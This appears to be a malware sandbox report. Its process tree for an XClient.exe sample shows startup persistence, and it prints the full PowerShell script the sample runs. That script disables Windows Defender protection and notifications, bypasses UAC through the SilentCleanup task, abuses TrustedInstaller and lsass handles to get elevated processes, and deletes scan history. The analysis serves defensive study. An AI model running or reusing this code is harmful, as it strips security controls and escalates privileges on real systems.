     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                                                                              4⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2144
                                                                              • C:\Windows\system32\sc.exe
                                                                                "C:\Windows\system32\sc.exe" qc windefend
                                                                                5⤵
                                                                                • Launches sc.exe
                                                                                PID:4996
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                5⤵
                                                                                  PID:5656
                                                                                  • C:\Windows\system32\SecurityHealthSystray.exe
                                                                                    SecurityHealthSystray
                                                                                    6⤵
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:5672
                                                                                • C:\Windows\system32\whoami.exe
                                                                                  "C:\Windows\system32\whoami.exe" /groups
                                                                                  5⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2556
                                                                                • C:\Windows\system32\net1.exe
                                                                                  "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                  5⤵
                                                                                    PID:4656
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                                                                                  4⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5272
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    "C:\Windows\system32\sc.exe" qc windefend
                                                                                    5⤵
                                                                                    • Launches sc.exe
                                                                                    PID:616
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                    5⤵
                                                                                      PID:5064
                                                                                      • C:\Windows\system32\SecurityHealthSystray.exe
                                                                                        SecurityHealthSystray
                                                                                        6⤵
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:5212
                                                                                    • C:\Windows\system32\whoami.exe
                                                                                      "C:\Windows\system32\whoami.exe" /groups
                                                                                      5⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3856
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                      5⤵
                                                                                        PID:2916
                                                                              • C:\Users\Admin\Downloads\XClient.exe
                                                                                "C:\Users\Admin\Downloads\XClient.exe"
                                                                                1⤵
                                                                                • Checks computer location settings
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4036
                                                                                • C:\Users\Admin\AppData\Local\Temp\fqapjz.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\fqapjz.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2416
                                                                              • C:\Windows\system32\taskmgr.exe
                                                                                "C:\Windows\system32\taskmgr.exe" /4
                                                                                1⤵
                                                                                • Checks SCSI registry key(s)
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:5620
                                                                              • C:\Windows\servicing\TrustedInstaller.exe
                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                1⤵
                                                                                  PID:2552
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                                    2⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    • Modifies Windows Defender notification settings
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5388
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      "C:\Windows\system32\sc.exe" qc windefend
                                                                                      3⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2932
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                      3⤵
                                                                                        PID:4336
                                                                                        • C:\Windows\system32\SecurityHealthSystray.exe
                                                                                          SecurityHealthSystray
                                                                                          4⤵
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:5288
                                                                                      • C:\Windows\system32\whoami.exe
                                                                                        "C:\Windows\system32\whoami.exe" /groups
                                                                                        3⤵
                                                                                          PID:1904
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          "C:\Windows\system32\net1.exe" stop windefend
                                                                                          3⤵
                                                                                            PID:956
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2612
                                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -DisableService
                                                                                            3⤵
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5716
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                                          2⤵
                                                                                          • Modifies Windows Defender notification settings
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:1632
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1232
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                            3⤵
                                                                                              PID:764
                                                                                              • C:\Windows\system32\SecurityHealthSystray.exe
                                                                                                SecurityHealthSystray
                                                                                                4⤵
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:1348
                                                                                            • C:\Windows\system32\whoami.exe
                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                              3⤵
                                                                                                PID:5408
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                "C:\Windows\system32\net1.exe" stop windefend
                                                                                                3⤵
                                                                                                  PID:3008
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:4916
                                                                                                • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -DisableService
                                                                                                  3⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5624
                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                              1⤵
                                                                                                PID:3856

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                713ad359b75fe6d947468ec1825202b9

                                                                                                SHA1

                                                                                                19dcd19f18a2ad6deb581451aad724bd44a592a4

                                                                                                SHA256

                                                                                                56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

                                                                                                SHA512

                                                                                                4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                b03d78ec6b6f6bfc8ce2f6e81cd88647

                                                                                                SHA1

                                                                                                014cb7dc4aa1bc5d2cb4ec25ec58470baf5b6741

                                                                                                SHA256

                                                                                                983928a84fcf0791614cc3d17d92d62ffbed0bf0f141d7544d0cc762977a3905

                                                                                                SHA512

